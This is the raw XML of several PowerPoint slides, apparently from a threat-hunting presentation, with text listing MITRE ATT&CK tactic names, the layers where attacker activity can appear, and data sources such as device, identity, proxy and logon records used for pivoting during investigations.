      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="28"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ctagonal prism 20 free Cliparts | Download images on Clipground 2019">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2167F031-E875-C19D-495A-BEB99D9319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59" r="2714" b="9640"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="479103" y="1230448"/>
            <a:ext cx="11478268" cy="53784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02A706-0455-A60A-35AB-4505BF544A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker actions can exist at many logical layers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Diagram 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26B8115-F2AF-40E6-3C73-660EBD1B9006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="511828825"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1859650" y="1388118"/>
          <a:ext cx="6177445" cy="5063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5F3EEFD1-9E39-E910-34DC-4230CA3233B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195799" y="1273695"/>
            <a:ext cx="2624404" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reconnaissance	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial Access	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense Evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lateral Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command and Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exfiltration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B95E2E-E7FE-F70D-F415-894EB0F7DE3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8102183" y="1590623"/>
            <a:ext cx="3972395" cy="4559691"/>
            <a:chOff x="8102183" y="1590623"/>
            <a:chExt cx="3972395" cy="4559691"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Parallelogram 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B017370-79B5-9B02-F170-2F1D67534A8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102184" y="5119141"/>
              <a:ext cx="3972394" cy="1031173"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 88179"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="70AD47">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="85098"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="70AD47">
                  <a:lumMod val="75000"/>
                </a:srgbClr>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0" name="Parallelogram 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1241CC4C-0587-E14F-4C02-430C9C780D7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102184" y="4407108"/>
              <a:ext cx="3972394" cy="1031173"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 88179"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5B9BD5">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
                <a:alpha val="85098"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="5B9BD5">
                  <a:lumMod val="75000"/>
                </a:srgbClr>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3" name="Parallelogram 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9265913A-0676-C7C0-14B2-EDF984905DE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102183" y="3715810"/>
              <a:ext cx="3972394" cy="1031173"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 88179"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="530FAD">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="84706"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="530FAD">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:srgbClr>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4" name="Parallelogram 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069BEA16-048C-CE58-DE02-9FBC0B9990AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102183" y="2999559"/>
              <a:ext cx="3972394" cy="1031173"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 88179"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DF3480">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="85098"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DF3480"/>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5" name="Parallelogram 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4D0464-E8E2-15B4-5E99-2EF4B12DC6EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102183" y="2308261"/>
              <a:ext cx="3972394" cy="1031173"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 88179"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFE2D6">
                <a:alpha val="84706"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF6E30"/>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6" name="Parallelogram 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4897D8C-436E-9CA2-C5C0-72B94C919195}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102183" y="1590623"/>
              <a:ext cx="3972394" cy="1031173"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 88179"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF2CC">
                <a:alpha val="85098"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFC000">
                  <a:lumMod val="75000"/>
                </a:srgbClr>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ADCD4F1F-8400-AFC6-2FFD-C7DB45C5E9C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8985043" y="4058930"/>
            <a:ext cx="2121097" cy="1508106"/>
            <a:chOff x="8985043" y="4058930"/>
            <a:chExt cx="2121097" cy="1508106"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE3547B-7CF3-8158-51D0-4389ED6C23A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8985044" y="4366707"/>
              <a:ext cx="2121096" cy="1200329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>TCP/UDP</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>HTTP/S</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Application Service</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Cloud Service</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629898DE-C030-4263-2A39-50FB2684B119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8985043" y="4058930"/>
              <a:ext cx="2121095" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>C2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2379A47D-AC8F-B409-625B-ED1663DE2A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8985043" y="1816747"/>
            <a:ext cx="2121097" cy="1254797"/>
            <a:chOff x="8985043" y="1781291"/>
            <a:chExt cx="2121097" cy="1254797"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDDBC4C1-2A48-7187-2AD4-7F135761F48C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8985044" y="2112758"/>
              <a:ext cx="2121096" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Malware</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Fileless malware</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Living off the land</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F945B5C-191B-DE3C-F059-F59413C92F64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8985043" y="1781291"/>
              <a:ext cx="2121095" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Persistence</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16955038-EC51-F17F-B15F-DC3AF2151525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245981" y="6530400"/>
            <a:ext cx="10860157" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If you can’t find attacker activity, is there a layer you are missing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1652035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Pivoting is navigating the Graph of your data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9639300" y="6483350"/>
            <a:ext cx="2797175" cy="37147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24"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7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2103437" y="2201862"/>
            <a:ext cx="5230368" cy="3328416"/>
            <a:chOff x="3246437" y="2268918"/>
            <a:chExt cx="5230368" cy="3328416"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5834189" y="2270760"/>
              <a:ext cx="2642616" cy="2953512"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2642616"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2953512"/>
                <a:gd name="connsiteX1" fmla="*/ 1042416 w 2642616"/>
                <a:gd name="connsiteY1" fmla="*/ 2157984 h 2953512"/>
                <a:gd name="connsiteX2" fmla="*/ 2642616 w 2642616"/>
                <a:gd name="connsiteY2" fmla="*/ 2953512 h 2953512"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2642616"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 2953512"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2642616" h="2953512">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1042416" y="2157984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642616" y="2953512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:ln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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3246437" y="2279904"/>
              <a:ext cx="3630168" cy="2487168"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 3630168"/>
                <a:gd name="connsiteY0" fmla="*/ 2487168 h 2487168"/>
                <a:gd name="connsiteX1" fmla="*/ 3630168 w 3630168"/>
                <a:gd name="connsiteY1" fmla="*/ 2139696 h 2487168"/>
                <a:gd name="connsiteX2" fmla="*/ 2606040 w 3630168"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 2487168"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 3630168"/>
                <a:gd name="connsiteY3" fmla="*/ 2487168 h 2487168"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3630168" h="2487168">
                  <a:moveTo>
                    <a:pt x="0" y="2487168"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3630168" y="2139696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606040" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2487168"/>
                  </a:ln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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3246437" y="2278062"/>
              <a:ext cx="2596896" cy="3310128"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2596896"/>
                <a:gd name="connsiteY0" fmla="*/ 2523744 h 3310128"/>
                <a:gd name="connsiteX1" fmla="*/ 2596896 w 2596896"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 3310128"/>
                <a:gd name="connsiteX2" fmla="*/ 1600200 w 2596896"/>
                <a:gd name="connsiteY2" fmla="*/ 3310128 h 3310128"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2596896"/>
                <a:gd name="connsiteY3" fmla="*/ 2523744 h 3310128"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2596896" h="3310128">
                  <a:moveTo>
                    <a:pt x="0" y="2523744"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2596896" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600200" y="3310128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="252374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10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4846637" y="2268918"/>
              <a:ext cx="3630168" cy="3328416"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 3630168"/>
                <a:gd name="connsiteY0" fmla="*/ 3328416 h 3328416"/>
                <a:gd name="connsiteX1" fmla="*/ 3630168 w 3630168"/>
                <a:gd name="connsiteY1" fmla="*/ 2971800 h 3328416"/>
                <a:gd name="connsiteX2" fmla="*/ 1014984 w 3630168"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 3328416"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 3630168"/>
                <a:gd name="connsiteY3" fmla="*/ 3328416 h 3328416"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3630168" h="3328416">
                  <a:moveTo>
                    <a:pt x="0" y="3328416"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3630168" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014984" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3328416"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762817" y="4069074"/>
            <a:ext cx="1537716" cy="369332"/>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13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017837" y="5605098"/>
            <a:ext cx="1467612" cy="369332"/>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Device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315827" y="5072593"/>
            <a:ext cx="1066471" cy="369332"/>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Identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783798" y="4376850"/>
            <a:ext cx="1288397" cy="369332"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4995989" y="4388843"/>
            <a:ext cx="1600200" cy="738664"/>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FW/Proxy</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Remote Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7362028" y="5366511"/>
            <a:ext cx="2225919" cy="738664"/>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Logons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Access logs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Entitlement Changes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
